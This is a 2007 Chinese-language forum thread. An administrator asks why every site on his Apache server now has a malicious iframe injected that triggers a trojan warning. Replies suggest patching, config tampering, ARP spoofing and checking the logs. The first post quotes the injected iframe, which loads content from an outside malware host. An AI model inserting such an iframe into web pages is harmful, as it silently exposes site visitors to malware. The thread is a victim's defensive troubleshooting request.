熟悉apache的高人指点一下，服务器被注入恶意代码了

jinhailong

UID: 32876
帖子: 79
积分: 181
在线时间: 8 小时

1^# jinhailong 发表于 2007-05-17 09:09

熟悉apache的高人指点一下，服务器被注入恶意代码了

今天突然发现只要一打开网站就诺顿会弹出病毒警告，Trojan.Anicmoo，查看网页源文件发现头上被加了 <iframe src=http://www.69642.cn/wm/18.htm width=100 height=0 frameborder=0> </iframe> 这么一段代码，然后发现访问服务器上的每个站点都会被添加这段代码，

请问是那里被修改了才会有这样的效果？
是那里出了漏洞？
如何防范？

bigman_lfj

UID: 10855
帖子: 45
积分: 103
在线时间: 3 小时

2^# bigman_lfj 发表于 2007-05-17 09:30

先把服务器的漏洞打上阿。

然后着手解决。

如何hack这样的效果，可以参考以下，说的很详细，理论上的，赫赫。 //英文
http://www.vitalsecurity.org/xpire-splitinfinity-serverhack_malwareinstall-condensed.pdf

jinhailong

UID: 32876
帖子: 79
积分: 181
在线时间: 8 小时

3^# jinhailong 发表于 2007-05-17 10:24

文档全看完了，可是看了半天也没看明白到底说些什么啊

jinhailong

UID: 32876
帖子: 79
积分: 181
在线时间: 8 小时

4^# jinhailong 发表于 2007-05-17 10:46

文档光说了黑客该怎么干，没说服务器到底是怎么被传染上的和那段代码是怎么被加上去的，所以还是不知道该怎么解决啊，至于打补丁的事情那时解决问题以后的事了。

21bird

UID: 15745
帖子: 1
积分: 2
在线时间: 10 分钟

5^# 21bird 发表于 2007-05-17 11:26

是不是每个页面都有那个代码？

如果是，那就是修改了配置文件吧？

配置文件里有个设置……

jinhailong

UID: 32876
帖子: 79
积分: 181
在线时间: 8 小时

6^# jinhailong 发表于 2007-05-17 11:34

是的，上服务器察看页面文件就没有那些代码，是动态添加的，但是配置文件里没看到什么异常啊，是在哪个部分呢？

zsjqp

UID: 13116
帖子: 9
积分: 20
在线时间: 10 分钟

7^# zsjqp 发表于 2007-05-23 22:01

你服务器的网络或客户端的网络中了arp欺骗
如果客户端上任何网站都被加了代码那就是客户端中了
否则是服务器端中了

kapil

UID: 33354
帖子: 1
积分: 2
在线时间: 10 分钟

8^# kapil 发表于 2007-06-14 10:47

是不是页面被修改了？
查看LINUX的日志吧